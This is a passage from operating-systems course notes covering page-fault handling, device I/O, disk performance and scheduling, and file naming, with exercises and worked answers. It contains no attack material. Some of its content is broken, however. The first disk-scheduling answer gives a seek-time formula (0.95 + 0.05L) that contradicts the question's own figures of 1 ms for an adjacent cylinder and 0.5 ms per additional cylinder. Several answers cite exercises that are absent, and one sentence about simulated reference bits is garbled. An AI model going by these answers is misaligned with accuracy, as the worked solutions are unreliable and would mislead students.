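As a purely illustrative check of the formula: with an average process size of s = 1 megabyte and a page-table entry of e = 4 bytes, sqrt(2se) = sqrt(2 × 1,048,576 × 4) ≈ 2,896 bytes, which would suggest a page size in the 2K-4K range.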
Restarting the instruction
After the OS has brought in the missing page and fixed up the page table, it should restart the
process in such a way as to cause it to re-try the offending instruction. Unfortunately, that may
not be easy to do, for a variety of reasons.
Variable-length instructions
Some CPU architectures have instructions with varying numbers of arguments. For example the
Motorola 68000 has a move instruction with two arguments (source and target of the move). It
can cause faults for three different reasons: the instruction itself or either of the two operands.
The fault handler has to determine which reference faulted. On some computers, the OS has to
figure that out by interpreting the instruction and in effect simulating the hardware. The 68000
made it easier for the OS by updating the PC as it goes, so the PC will be pointing at the word
immediately following the part of the instruction that caused the fault. On the other hand, this
makes it harder to restart the instruction: How can the OS figure out where the instruction
started, so that it can back the PC up to retry?
Side effects
Some computers have addressing modes that automatically increment or decrement index
registers as a side effect, making it easy to simulate in one step the effect of the C statement
*p++ = *q++;. Unfortunately, if an instruction faults part-way through, it may be difficult to
figure out which registers have been modified so that they can be restored to their original state.
Some computers also have instructions such as ``move characters,'' which work on variable-length data fields, updating a pointer or count register. If an operand crosses a page boundary,
the instruction may fault part-way through, leaving a pointer or counter register modified.
Fortunately, most CPU designers know enough about operating systems to understand these
problems and add hardware features to allow the OS to recover. Either they undo the effects of
the instruction before faulting, or they dump enough information into registers somewhere that
the OS can undo them. The original 68000 did neither of these and so paging was not possible on
the 68000. It wasn't that the designers were ignorant of OS issues; it was just that there was not
enough room on the chip to add the features. However, one clever manufacturer built a box with
two 68000 CPUs and an MMU chip. The first CPU ran ``user'' code. When the MMU detected a
page fault, instead of interrupting the first CPU, it delayed responding to it and interrupted the
second CPU. The second CPU would run all the OS code necessary to respond to the fault and
then cause the MMU to retry the storage access. This time, the access would succeed and return
the desired result to the first CPU, which never realized there was a problem.
Locking Pages
There are a variety of cases in which the OS must prevent certain page frames from being chosen
by the page-replacement algorithm. For example, suppose the OS has chosen a particular frame
to service a page fault and sent a request to the disk scheduler to read in the page. The request
may take a long time to service, so the OS will allow other processes to run in the meantime. It
must be careful, however, that a fault by another process does not choose the same page frame!
A similar problem involves I/O. When a process requests an I/O operation it gives the virtual
address of the buffer the data is supposed to be read into or written out of. Since DMA devices
generally do not know anything about virtual memory, the OS translates the buffer address into a
physical memory location (a frame number and offset) before starting the I/O device. It would be
very embarrassing if the frame were chosen by the page-replacement algorithm before the I/O
operation completes. Both of these problems can be avoided by marking the frame as ineligible
for replacement. We usually say that the page in that frame is ``pinned'' in memory. An
alternative way of avoiding the I/O problem is to do the I/O operation into or out of pages that
belong to the OS kernel (and are not subject to replacement) and copying between these pages
and user pages.
Missing Reference Bits
At least one popular computer, the Digital Equipment Corp. VAX computer, did not have any
REF bits in its MMU. Some people at the University of California at Berkeley came up with a
clever way of simulating the REF bits in software. Whenever the OS cleared the simulated REF
bit for a page, it marked the hardware page-table entry for the page as invalid. When the process
first referenced the page, it would cause a page fault. The OS would note that the page really was
in memory, so the fault handler could return without doing any I/O operations, but the fault
would give the OS the chance to turn the simulated REF bit on and mark the page as valid, so
subsequent references to the page would not cause page faults. Although the software simulated
hardware with a real REF bit, the net result was that there was a rather high cost to clearing
the simulated REF bit. The people at Berkeley therefore developed a version of the CLOCK
algorithm that allowed them to clear the REF bit infrequently.
Fault Handling
Overall, the core of the OS kernel looks something like this:
// This is the procedure that gets called when an interrupt occurs;
// on some computers, there is a different handler for each "kind"
// of interrupt.
void handler() {
    save_process_state(current_PCB);
    // Some state (such as the PC) is automatically saved by the HW.
    // This code copies that info to the PCB and possibly saves some
    // more state.
    switch (what_caused_the_trap) {
    case PAGE_FAULT:
        f = choose_frame();
        if (is_dirty(f))
            schedule_write_request(f);  // to clean the frame
        else
            schedule_read_request(f);   // to read in the requested page
        record_state(current_PCB);      // to indicate what this process is up to
        make_unrunnable(current_PCB);
        current_PCB = select_some_other_ready_process();
        break;
    case IO_COMPLETION:
        p = process_that_requested_the_IO();
        switch (reason_for_the_IO) {
        case PAGE_CLEANING:
            // f here is the frame that has just been cleaned
            schedule_read_request(f);   // to read in the requested page
            break;
        case BRING_IN_NEW_PAGE:
        case EXPLICIT_IO_REQUEST:
            make_runnable(p);
            break;
        }
        break;
    case IO_REQUEST:
        schedule_io_request();
        record_state(current_PCB);      // to indicate what this process is up to
        make_unrunnable(current_PCB);
        current_PCB = select_some_other_ready_process();
        break;
    case OTHER_OS_REQUEST:
        perform_request();
        break;
    }
    // At this point, current_PCB is pointing to a process that
    // is ready to run. It may or may not be the process that was
    // running when the interrupt occurred.
    restore_state(current_PCB);
    return_from_interrupt(current_PCB);
    // This hardware instruction restores the PC (and possibly other
    // hardware state) and allows the indicated process to continue.
}
5.7 Exercises
1. Name two differences between logical and physical addresses.
Answer:
A logical address does not refer to an actual existing address; rather, it refers to an abstract
address in an abstract address space. Contrast this with a physical address that refers to an
actual physical address in memory. A logical address is generated by the CPU and is
translated into a physical address by the memory management unit (MMU). Therefore,
physical addresses are generated by the MMU.
2. Consider a system in which a program can be separated into two parts: code and data. The
CPU knows whether it wants an instruction (instruction fetch) or data (data fetch or store).
Therefore, two base–limit register pairs are provided: one for instructions and one for data.
The instruction base–limit register pair is automatically read-only, so programs can be shared
among different users. Discuss the advantages and disadvantages of this scheme.
Answer:
The major advantage of this scheme is that it is an effective mechanism for code and data
sharing. For example, only one copy of an editor or a compiler needs to be kept in memory,
and this code can be shared by all processes needing access to the editor or compiler code.
Another advantage is protection of code against erroneous modification.
The only disadvantage is that the code and data must be kept separate, a constraint that
compiler-generated code usually already satisfies.
3. Why are page sizes always powers of 2?
Answer:
Recall that paging is implemented by breaking up an address into a page and offset number.
It is most efficient to break the address into X page bits and Y offset bits, rather than perform
arithmetic on the address to calculate the page number and offset. Because each bit position
represents a power of 2, splitting an address between bits results in a page size that is a power
of 2.
4. Consider a logical address space of eight pages of 1024 words each, mapped onto a physical
memory of 32 frames.
(a) How many bits are there in the logical address?
(b) How many bits are there in the physical address?
Answer:
(a) Logical address: 13 bits, since 8 pages of 1024 words each give 2^3 * 2^10 = 2^13 addressable words.
(b) Physical address: 15 bits, since 32 frames of 1024 words each give 2^5 * 2^10 = 2^15 addressable words.
5. What is the effect of allowing two entries in a page table to point to the same page frame in
memory? Explain how this effect could be used to decrease the amount of time needed to
copy a large amount of memory from one place to another. What effect would updating some
byte on the one page have on the other page?
Answer:
By allowing two entries in a page table to point to the same page frame in memory, users can
share code and data. If the code is reentrant, much memory space can be saved through the
shared use of large programs such as text editors, compilers, and database systems.
“Copying” a large amount of memory can be effected by having two page-table entries point
to the same memory location: the data is shared rather than physically copied, so the “copy”
appears to happen almost instantly. However, sharing of non-reentrant code or data means that any
user having access to the code can modify it, and these modifications would be reflected in
the other user’s “copy.”
6. Device Management
So far, we have covered how an operating system manages CPU and memory resources.
However, a computer is not so interesting without I/O devices (e.g., hard drives, network cards,
screen displays, keyboards, mice, rats, and so on). Device management is the part of the OS that
manages hardware devices. Device management tries to (1) provide a uniform interface to ease
the access to devices with different physical characteristics, and (2) optimize the performance of
individual devices.
6.1 I/O Devices
I/O devices can be roughly divided into two categories. A block device (e.g., disks) stores
information in fixed-size blocks, each one with its own address. A character device (e.g.,
keyboards, printers, network cards) delivers or accepts a stream of characters, and individual
characters are not addressable.
A device is connected to a computer through an electronic component, or a device controller,
which converts between the serial bit stream and a block of bytes and performs error correction if
necessary. Each controller has a few device registers that are used for communicating with the
CPU, and a data buffer that an OS can read or write. Since the number of device registers and
the nature of device instructions vary from device to device, a device driver (an OS component) is
responsible for hiding the complexity of an I/O device, so that the OS can access various devices in
a relatively uniform manner.
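To make this concrete, here is a minimal Java sketch of the kind of uniform interface a device-driver layer might present (the interface and method names, such as BlockDevice and readBlock, are invented for illustration); each concrete driver hides its controller's registers and quirks behind the same small set of operations.

// A uniform interface that the rest of the OS programs against.
interface BlockDevice {
    int blockSize();                            // bytes per block
    void readBlock(long blockNo, byte[] buf);   // fill buf from the device
    void writeBlock(long blockNo, byte[] buf);  // write buf to the device
}

// One concrete driver; a different device would provide a different
// implementation behind the same interface.
class RamDiskDriver implements BlockDevice {
    private final byte[][] blocks;
    private final int blockSize;

    RamDiskDriver(int numBlocks, int blockSize) {
        this.blocks = new byte[numBlocks][blockSize];
        this.blockSize = blockSize;
    }

    public int blockSize() { return blockSize; }

    public void readBlock(long blockNo, byte[] buf) {
        System.arraycopy(blocks[(int) blockNo], 0, buf, 0, blockSize);
    }

    public void writeBlock(long blockNo, byte[] buf) {
        System.arraycopy(buf, 0, blocks[(int) blockNo], 0, blockSize);
    }
}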
Figure 6.1 Structure of I/O system (layers, from top to bottom: user applications at the user level; various OS components and device drivers at the OS level; device controllers and I/O devices at the hardware level)
6.2 Device Addressing
In general, there are two approaches to addressing these device registers and data buffers. The
first approach is to give each device a dedicated range of device addresses, separate from the
memory address space, so accessing those device addresses requires special I/O instructions. The
second approach (memory-mapped I/O) does not distinguish device addresses from normal memory
addresses, so devices can be accessed the same way as normal memory, with the same set of
hardware instructions.
Figure 6.2 Device I/O addressing (left: separate device addresses, where devices occupy their own address range apart from primary memory; right: memory-mapped I/O, where device registers appear within the normal memory address space)
6.3 Device Accesses
Regardless of the device addressing approach, the operating system has to track the status of a
device in order to exchange data with it. The simplest approach is to use polling, where the CPU
repeatedly checks the device's status until the device is ready to exchange data.
However, wasting CPU cycles on busy-waiting is undesirable. A better approach is to use
interrupt-driven I/Os, where a device controller notifies the corresponding device driver when
the device is available. Although the interrupt-driven approach is much more efficient than
polling, the CPU is still actively involved in copying data between the device and memory.
Also, interrupt-driven I/Os still impose high overheads for character devices. For example, a
printer raises one interrupt per byte, so the overhead of handling the interrupt far exceeds the cost of
transmitting a single byte.
An even better approach is to use an additional direct memory access (DMA) controller to
perform the actual movements of data, so the CPU can use the cycles for computation as
opposed to copying data.
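As a rough illustration of what the better approaches eliminate, here is a Java sketch of the polling style of access (the DeviceRegisters class and its fields are invented for illustration); the busy-wait loop is exactly the CPU time that interrupt-driven and DMA-based I/O try to reclaim.

class PollingIo {
    // Stand-ins for a controller's status register and data buffer.
    static class DeviceRegisters {
        volatile boolean ready;   // set by the device when a byte is available
        volatile byte data;       // the byte the device produced
    }

    // Read one byte by polling: the CPU spins until the device is ready.
    static byte readByte(DeviceRegisters dev) {
        while (!dev.ready) {
            // busy-waiting: these CPU cycles do no useful work
        }
        byte b = dev.data;
        dev.ready = false;        // acknowledge, so the device can proceed
        return b;
    }
}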
The use of DMA alone still has room for improvement. Since a process cannot access the data
that is being brought into memory at the moment, due to mutual exclusion, a more efficient
approach is to pipeline the data transfer. The double buffering technique uses two buffers in the
following way: while one is being used, the other is being filled. Double buffering is also used
extensively for graphics and smooth animation. While the screen displays an image frame from
one buffer in the video controller, a separate buffer is being filled pixel-by-pixel in the
background, so a viewer does not see the line-by-line scanning on the screen. Once the
background buffer is filled, the video controller switches the roles of the two buffers and displays
from the freshly filled buffer.
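A minimal Java sketch of double buffering follows (the class and method names are invented for illustration): one buffer is consumed while the other is being filled, and the two swap roles when the fill completes.

class DoubleBuffer {
    private byte[] front;   // being consumed (e.g., displayed or written out)
    private byte[] back;    // being filled in the background

    DoubleBuffer(int size) {
        front = new byte[size];
        back = new byte[size];
    }

    // The producer fills the back buffer while the front buffer is in use.
    byte[] backBuffer() { return back; }

    // The consumer reads from the front buffer.
    byte[] frontBuffer() { return front; }

    // Called when the back buffer is full: swap the roles of the buffers,
    // so the freshly filled data becomes visible to the consumer.
    synchronized void swap() {
        byte[] tmp = front;
        front = back;
        back = tmp;
    }
}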
6.4 Overlapped I/O and CPU Processing
By freeing up CPU cycles while devices are serving requests, CPU-bound processes can be
executed concurrently with I/O-bound processes. For example, if process A is CPU-bound, and
process B is I/O-bound, the system as a whole can reach high utilization by overlapping CPU
and I/O processing effectively.
Figure 6.3 I/O and CPU processing (process A loops over 90 msec of CPU work followed by 10 msec of I/O; process B loops over 10 msec of CPU work followed by 90 msec of I/O; when run together, A's CPU bursts overlap with B's I/O waits and vice versa)
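A quick back-of-the-envelope check of this example, written as a small Java sketch using the numbers from Figure 6.3: run alone, process A keeps the CPU busy only 90% of the time and process B only 10%, but if A computes while B waits for its I/O and vice versa, both the CPU and the I/O device can stay close to fully busy.

class OverlapUtilization {
    public static void main(String[] args) {
        double aCpu = 90, aIo = 10;   // msec per iteration of process A
        double bCpu = 10, bIo = 90;   // msec per iteration of process B

        // Each process running alone:
        System.out.printf("A alone: CPU busy %.0f%%%n", 100 * aCpu / (aCpu + aIo));
        System.out.printf("B alone: CPU busy %.0f%%%n", 100 * bCpu / (bCpu + bIo));

        // Ideal overlap: in every 100 msec the CPU runs A for 90 msec and B
        // for 10 msec, while the I/O device serves B for 90 msec and A for 10.
        double period = 100;
        System.out.printf("Overlapped: CPU busy %.0f%%, I/O busy %.0f%%%n",
                100 * (aCpu + bCpu) / period, 100 * (aIo + bIo) / period);
    }
}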
6.5 Disk as an Example Device
The hard disk is a storage technology that is more than 30 years old, yet it is incredibly complicated. A
modern hard drive comes with roughly 250,000 lines of microcode to govern its various components.
Hardware Characteristics
Briefly, a hard drive consists of a disk arm and disk platters. Disk platters are coated with
magnetic materials for recording. The disk arm moves a comb of disk heads, among which only
one disk head is active for reading and writing.
One fascinating detail is that the heads are aerodynamically designed to fly as close to the surface as
possible. In fact, the flying height is so small that there is barely room for air molecules, and some drives
are filled with a special inert gas to help fly the disk heads. If a head touches the surface, the result is a
head crash, which scrapes off the magnetic information.
Each disk platter is further divided into concentric tracks of storage, and each track is divided
into sectors (typically 512 bytes). Each sector is a minimum unit of disk storage. A cylinder
consists of all tracks with a given arm position.
Figure 6.4 Configuration of a hard disk (disk platters divided into concentric tracks and sectors, with the disk arm positioning the heads over a track)
A modern hard drive also takes advantage of the disk geometry. Disk cylinders are further
grouped into zones, so zones near the edge of the disk can store more information than zones
near the center of the disk due to the differences in storage area (also known as zone-bit
recording). More information stored in outer zones also means that the transfer rate (rotational
speed multiplied by the information stored in a cylinder) is higher near the edge of the disk.
Since moving a disk arm from one track to the next takes time, the starting position of the next
track is slightly skewed (track skew), so that a sequential transfer of bytes across multiple tracks
can incur minimum rotational delay.
A hard drive also periodically performs thermal calibrations, which adjust the disk head
positioning to compensate for changes in the platter geometry caused by temperature changes. To
account for other minor physical inaccuracies, typically 100 to 1000 bits are inserted between
sectors.
A Simple Model of Disk Performance. The access time to read or write a disk sector includes
three components:
• Seek time: the time to position the heads over a cylinder (~8 msec on average).
• Rotational delay: the time to wait for the target sector to rotate underneath the head.
Assuming a speed of 7,200 rotations per minute, or 120 rotations per second, each
rotation takes ~8 msec, and the average rotational delay is ~4 msec.
• Transfer time: the time to transfer the bytes. Assuming a peak bandwidth of 58 Mbytes/sec,
transferring a disk block of 4 Kbytes takes ~0.07 msec.
Thus, the overall time to perform a disk I/O = seek time + rotational delay + transfer time. The
sum of the seek time and the rotational delay is the disk latency, or the time to initiate a transfer.
The transfer rate is the disk bandwidth.
If a disk block is randomly placed on the disk, the access time is roughly 12 msec to fetch 4 Kbytes
of data, for a bandwidth of roughly 340 Kbytes/sec.
If a disk block is randomly located on the same disk cylinder as the current disk arm position, there is
no seek time and the access time is roughly 4 msec, for a bandwidth of roughly 1 Mbyte/sec.
If the next sector is on the same track, there is no seek time or rotational delay, and the data is
transferred at the peak bandwidth of 58 Mbytes/sec.
Therefore, the key to using the hard drive effectively is to minimize the seek time and rotational
latency.
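The model can be checked with a short Java sketch using the figures above (8 msec average seek, 4 msec average rotational delay, 58 Mbytes/sec peak bandwidth); the helper names are invented and the results are approximate.

class DiskAccessTime {
    static final double SEEK_MS = 8.0;        // average seek time
    static final double ROTATION_MS = 4.0;    // average rotational delay
    static final double PEAK_MB_PER_S = 58.0; // peak transfer bandwidth

    static double transferMs(double kbytes) {
        return kbytes / 1024.0 / PEAK_MB_PER_S * 1000.0;
    }

    public static void main(String[] args) {
        double block = 4.0; // Kbytes
        double random = SEEK_MS + ROTATION_MS + transferMs(block);
        double sameCylinder = ROTATION_MS + transferMs(block);
        double sameTrack = transferMs(block);

        System.out.printf("random block:   %.2f msec (%.0f Kbytes/sec)%n",
                random, block / (random / 1000.0));
        System.out.printf("same cylinder:  %.2f msec (%.0f Kbytes/sec)%n",
                sameCylinder, block / (sameCylinder / 1000.0));
        System.out.printf("same track (no seek or rotation): %.3f msec%n", sameTrack);
    }
}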
Disk Tradeoffs
One design decision is the size of a disk sector.
Sector size   Space utilization                 Transfer rate
1 byte        8 bits / 1008 bits (0.8%)         80 bytes/sec (1 byte / 12 msec)
4 Kbytes      4096 bytes / 4221 bytes (97%)     340 Kbytes/sec (4 Kbytes / 12 msec)
1 Mbyte       ~100%                             58 Mbytes/sec (peak bandwidth)
Table 6.1 Wasteful allocation of disk space
A bigger sector size yields a more effective transfer rate from the hard drive. However, a large
allocation granularity is wasteful if only 1 byte out of a 1-Mbyte sector is actually needed for storage.
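The trend in Table 6.1 can be reproduced with a short Java sketch of the underlying calculation (a minimal model under stated assumptions: 125 bytes of inter-sector overhead, matching the roughly 1000 bits mentioned above, a 12-msec positioning cost per access, and a 58 Mbytes/sec peak bandwidth); it matches the small-sector rows closely and shows the effective transfer rate approaching the peak bandwidth as the sector size grows.

class SectorSizeTradeoff {
    static final double OVERHEAD_BYTES = 125;      // ~1000 bits between sectors
    static final double POSITION_MS = 12;          // seek + rotational delay
    static final double PEAK_BYTES_PER_MS = 58.0 * 1024 * 1024 / 1000;

    static void show(String label, double sectorBytes) {
        double utilization = sectorBytes / (sectorBytes + OVERHEAD_BYTES);
        double accessMs = POSITION_MS + sectorBytes / PEAK_BYTES_PER_MS;
        double rate = sectorBytes / (accessMs / 1000);   // bytes per second
        System.out.printf("%-8s utilization %5.1f%%  transfer %10.0f bytes/sec%n",
                label, 100 * utilization, rate);
    }

    public static void main(String[] args) {
        show("1 byte", 1);
        show("4 KB", 4 * 1024);
        show("1 MB", 1024 * 1024);
    }
}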
6.6 Disk Controller and Disk Device Driver
Two popular disk controllers are SCSI (small computer systems interface), and IDE (integrated
device electronics). Since they are not a part of the OS, please surf the net for more information.
One major function of the disk device driver is to reduce the seek time for disk accesses. Since a
disk can serve only one request at a time, the device driver can schedule the pending requests in such
a way as to minimize disk arm movement. There are a handful of disk scheduling strategies.
Please read Nutt’s book for detailed examples.
FIFO
Requests are served in the order of arrival. This policy is fair among requesters, but requests
may land on random spots on disk. Therefore, the seek time may be long.
SSTF (Shortest Seek Time First)
The shortest seek time first approach picks the request that is closest to the current disk arm
position. (Although called the shortest seek time first, this approach actually includes the
rotational delay in calculation, since rotation can be as long as seek.) SSTF is good at reducing
seeks, but may result in starvation.
SCAN
SCAN implements an elevator algorithm. It takes the closest request in the direction of travel. It
guarantees no starvation, but retains the flavor of SSTF. However, if a disk is heavily loaded
with requests, a new request at a location that has been just recently scanned can wait for almost
two full scans of the disk.
C-SCAN (Circular SCAN)
For C-SCAN, the disk arm always serves requests by scanning in one direction. Once the arm
finishes scanning for one direction, it quickly returns to the 0th track for the next round of
scanning.
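Below is a minimal Java sketch of two of these policies, SSTF and SCAN, operating on a queue of pending cylinder numbers (the class and method names are invented for illustration; a real driver would also have to cope with rotational position and with requests that arrive while the arm is moving).

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

class DiskScheduling {
    // SSTF: repeatedly pick the pending request closest to the current head position.
    static List<Integer> sstf(int head, List<Integer> pending) {
        List<Integer> queue = new ArrayList<>(pending);
        List<Integer> order = new ArrayList<>();
        while (!queue.isEmpty()) {
            Integer closest = queue.get(0);
            for (Integer r : queue)
                if (Math.abs(r - head) < Math.abs(closest - head)) closest = r;
            queue.remove(closest);
            order.add(closest);
            head = closest;
        }
        return order;
    }

    // SCAN (elevator): serve requests in one direction, then reverse.
    static List<Integer> scan(int head, boolean movingUp, List<Integer> pending) {
        List<Integer> sorted = new ArrayList<>(pending);
        Collections.sort(sorted);
        List<Integer> up = new ArrayList<>(), down = new ArrayList<>();
        for (int r : sorted) (r >= head ? up : down).add(r);
        Collections.reverse(down);               // nearest-first when moving down
        List<Integer> order = new ArrayList<>();
        if (movingUp) { order.addAll(up); order.addAll(down); }
        else          { order.addAll(down); order.addAll(up); }
        return order;
    }

    public static void main(String[] args) {
        List<Integer> pending = List.of(98, 183, 37, 122, 14, 124, 65, 67);
        System.out.println("SSTF: " + sstf(53, pending));
        System.out.println("SCAN: " + scan(53, true, pending));
    }
}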
6.7 Exercises
1. The accelerating seek described in Exercise 12.3 is typical of hard-disk drives. By contrast,
floppy disks (and many hard disks manufactured before the mid-1980s) typically seek at a
fixed rate. Suppose that the disk in Exercise 12.3 has a constant-rate seek rather than a
constant acceleration seek, so the seek time is of the form t = x + yL, where t is the time in
milliseconds and L is the seek distance. Suppose that the time to seek to an adjacent cylinder
is 1 millisecond, as before, and is 0.5 milliseconds for each additional cylinder.
(a) Write an equation for this seek time as a function of the seek distance.
(b) Using the seek-time function from part a, calculate the total seek time for each of the
schedules in Exercise 12.2. Is your answer the same as it was for Exercise 12.3(c)?
(c) What is the percentage speedup of the fastest schedule over FCFS in this case?
Answer:
(a) The equation is t = 0.95 + 0.05L
(b) FCFS 362.60; SSTF 95.80; SCAN 497.95; LOOK 174.50; C-SCAN 500.15 (and C-LOOK 176.70). SSTF is still the winner, and LOOK is the runner-up.
(c) (362.60 − 95.80)/362.60 = 0.74. The percentage speedup of SSTF over FCFS is 74% with
respect to the seek time. If we include the overhead of rotational latency and data transfer, the
percentage speedup will be less.
2. Is disk scheduling, other than FCFS scheduling, useful in a single-user environment? Explain
your answer.
Answer:
In a single-user environment, the I/O queue usually is empty. Requests generally arrive from
a single process for one block or for a sequence of consecutive blocks. In these cases, FCFS
is an economical method of disk scheduling. But LOOK is nearly as easy to program and will
give much better performance when multiple processes are performing concurrent I/O, such
as when a Web browser retrieves data in the background while the operating system is
paging and another application is active in the foreground.
3. Explain why SSTF scheduling tends to favor middle cylinders over the innermost and
outermost cylinders.
Answer:
The center of the disk is the location having the smallest average distance to all other tracks.
Thus the disk head tends to move away from the edges of the disk. Here is another way to
think of it. The current location of the head divides the cylinders into two groups. If the head
is not in the center of the disk and a new request arrives, the new request is more likely to be
in the group that includes the center of the disk; thus, the head is more likely to move in that
direction.
4. Why is rotational latency usually not considered in disk scheduling? How would you modify
SSTF, SCAN, and C-SCAN to include latency optimization?
Answer:
Most disks do not export their rotational position information to the host. Even if they did,
the time for this information to reach the scheduler would be subject to imprecision and the
time consumed by the scheduler is variable, so the rotational position information would
become incorrect. Further, the disk requests are usually given in terms of logical block
numbers, and the mapping between logical blocks and physical locations is very complex.
5. How would use of a RAM disk affect your selection of a disk-scheduling algorithm? What
factors would you need to consider? Do the same considerations apply to hard-disk
scheduling, given that the file system stores recently used blocks in a buffer cache in main
memory?
Answer:
Disk scheduling attempts to reduce the overhead time of disk head positioning. Since a RAM
disk has uniform access times, scheduling is largely unnecessary. The comparison between
RAM disk and the main memory disk-cache has no implications for hard-disk scheduling
because we schedule only the buffer cache misses, not the requests that find their data in
main memory.
6. Why is it important to balance file system I/O among the disks and controllers on a system in
a multitasking environment?
Answer:
A system can perform only at the speed of its slowest bottleneck. Disks or disk controllers
are frequently the bottleneck in modern systems as their individual performance cannot keep
up with that of the CPU and system bus. By balancing I/O among disks and controllers,
neither an individual disk nor a controller is overwhelmed, so that bottleneck is avoided.
7. File Management
7.1 General Concepts
Just as the process abstraction beautifies the hardware by making a single CPU (or a small
number of CPUs) appear to be many CPUs, one per ``user,'' the file system beautifies the
hardware disk, making it appear to be a large number of disk-like objects called files. Like a disk,
a file is capable of storing a large amount of data cheaply, reliably, and persistently. The fact that
there are lots of files is one form of beautification: Each file is individually protected, so each
user can have his own files, without the expense of requiring each user to buy his own disk. Each
user can have lots of files, which makes it easier to organize persistent data. The file system also
makes each individual file more beautiful than a real disk. At the very least, it erases block
boundaries, so a file can be any length (not just a multiple of the block size) and programs can
read and write arbitrary regions of the file without worrying about whether they cross block
boundaries. Some systems (not UNIX) also provide assistance in organizing the contents of a
file.
Systems use the same sort of device (a disk drive) to support both virtual memory and files. The
question arises why these have to be distinct facilities, with vastly different user interfaces. The
answer is that they don't. In Multics, there was no difference whatsoever. Everything in Multics
was a segment. The address space of each running process consisted of a set of segments (each
with its own segment number), and the ``file system'' was simply a set of named segments. To
access a segment from the file system, a process would pass its name to a system call that
assigned a segment number to it. From then on, the process could read and write the segment
simply by executing ordinary loads and stores. For example, if the segment was an array of
integers, the program could access the ith number with a notation like a[i] rather than having to
seek to the appropriate offset and then execute a read system call. If the block of the file
containing this value wasn't in memory, the array access would cause a page fault, which was
serviced as explained in the previous chapter.
This user-interface idea, sometimes called ``single-level store,'' is a great idea. So why is it not
common in current operating systems? In other words, why are virtual memory and files
presented as very different kinds of objects? There are several explanations one might propose:
The address space of a process is small compared to the size of a file system.
There is no reason why this has to be so. In Multics, a process could have up to 256K segments,
but each segment was limited to 64K words. Multics allowed for lots of segments because every
``file'' in the file system was a segment. The upper bound of 64K words per segment was
considered large by the standards of the time; the hardware actually allowed segments of up to
256K words (over one megabyte). Most new processors introduced in the last few years allow
64-bit virtual addresses. In a few years, such processors will dominate. So there is no reason why
the virtual address space of a process cannot be large enough to include the entire file system.
The virtual memory of a process is transient--it goes away when the process terminates--while
files must be persistent.
Multics showed that this doesn't have to be true. A segment can be designated as ``permanent,''
meaning that it should be preserved after the process that created it terminates. Permanent
segments do raise a need for one ``file-system-like'' facility: the ability to give names to segments
so that new processes can find them.
Files are shared by multiple processes, while the virtual address space of a process is associated
with only that process.
Most modern operating systems (including most variants of UNIX) provide some way for
processes to share portions of their address spaces anyhow, so this is a particularly weak
argument for a distinction between files and segments.
The real reason single-level store is not ubiquitous is probably a concern for efficiency. The
usual file-system interface encourages a particular style of access: Open a file, go through it
sequentially, copying big chunks of it to or from main memory, and then close it. While it is
possible to access a file like an array of bytes, jumping around and accessing the data in tiny
pieces, it is awkward. Operating system designers have found ways to implement files that make
the common ``file like'' style of access very efficient. While there appears to be no reason in
principle why memory-mapped files cannot be made to give similar performance when they are
accessed in this way, in practice, the added functionality of mapped files always seems to pay a
price in performance. Besides, if it is easy to jump around in a file, applications programmers
will take advantage of it, overall performance will suffer, and the file system will be blamed.
Naming
Every file system provides some way to give a name to each file. We will consider only names
for individual files here, and talk about directories later. The name of a file is (at least
sometimes) meant to be used by human beings, so it should be easy for humans to use. Different
operating systems put different restrictions on names.
Size
Some systems put severe restrictions on the length of names. For example DOS restricts names
to 11 characters, while early versions of UNIX (and some still in use today) restrict names to 14
characters. The Macintosh operating system, Windows 95, and most modern versions of UNIX
allow names to be essentially arbitrarily long. We say ``essentially'' since names are meant to be
used by humans, so they don't really need to be all that long. A name that is 100 characters long is
just as difficult to use as one that is forced to be under 11 characters long (but for different
reasons). Most modern versions of UNIX, for example, restrict names to a limit of 255
characters.
Case
Are upper and lower case letters considered different? The UNIX tradition is to consider the
names Foo and foo to be completely different and unrelated names. In DOS and its descendants,
however, they are considered the same. Some systems translate names to one case (usually upper
case) for storage. Others retain the original case, but consider it simply a matter of decoration.
For example, if you create a file named ``Foo,'' you could open it as ``foo'' or ``FOO,'' but if you
list the directory, you would still see the file listed as ``Foo''.
Character Set
Different systems put different restrictions on what characters can appear in file names. The
UNIX directory structure supports names containing any character other than NUL (the byte
consisting of all zero bits), but many utility programs (such as the shell) would have troubles
with names that have spaces, control characters or certain punctuation characters (particularly
`/'). MacOS allows all of these (e.g., it is not uncommon to see a file name with the Copyright
symbol © in it). With the world-wide spread of computer technology, it is becoming increasingly
important to support languages other than English, and in fact alphabets other than Latin. There
is a move to support character strings (and in particular file names) in the Unicode character set,
which devotes 16 bits to each character rather than 8 and can represent the alphabets of all major
modern languages from Arabic to Devanagari to Telugu to Khmer.
Format
It is common to divide a file name into a base name and an extension that indicates the type of
the file. DOS requires that each name be composed of a base name of eight or fewer characters and
an extension of three or fewer characters. When the name is displayed, it is represented as
base.extension. UNIX internally makes no such distinction, but it is a common convention to
include exactly one period in a file name (e.g. foo.c for a C source file).
7.2 File System Structure
UNIX hides the ``chunkiness'' of tracks, sectors, etc. and presents each file as a ``smooth'' array
of bytes with no internal structure. Application programs can, if they wish, use the bytes in the
file to represent structures. For example, a wide-spread convention in UNIX is to use the newline
character (the character with bit pattern 00001010) to break text files into lines. Some other
systems provide a variety of other types of files. The most common are files that consist of an
array of fixed or variable size records and files that form an index mapping keys to values.
Indexed files are usually implemented as B-trees.
File Types
Most systems divide files into various ``types.'' The concept of ``type'' is a confusing one,
partially because the term ``type'' can mean different things in different contexts. UNIX initially
supported only four types of files: directories, two kinds of special files (discussed later), and
``regular'' files. Just about any type of file is considered a ``regular'' file by UNIX. Within this
category, however, it is useful to distinguish text files from binary files; within binary files there
are executable files (which contain machine-language code) and data files; text files might be
source files in a particular programming language (e.g. C or Java) or they may be humanreadable text in some mark-up language such as html (hypertext markup language). Data files
may be classified according to the program that created them or is able to interpret them, e.g., a
file may be a Microsoft Word document or Excel spreadsheet or the output of TeX. The
possibilities are endless.
In general (not just in UNIX) there are three ways of indicating the type of a file:
1. The operating system may record the type of a file in meta-data stored separately from
the file, but associated with it. UNIX only provides enough meta-data to distinguish a
regular file from a directory (or special file), but other systems support more types.
2. The type of a file may be indicated by part of its contents, such as a header made up of
the first few bytes of the file. In UNIX, files that store executable programs start with a
two byte magic number that identifies them as executable and selects one of a variety of
executable formats. In the original UNIX executable format, called the a.out format, the
magic number is the octal number 0407, which happens to be the machine code for a
branch instruction on the PDP-11 computer, one of the first computers to implement
UNIX. The operating system could run a file by loading it into memory and jumping to
the beginning of it. The 0407 code, interpreted as an instruction, jumps to the word
following the 16-byte header, which is the beginning of the executable code in this
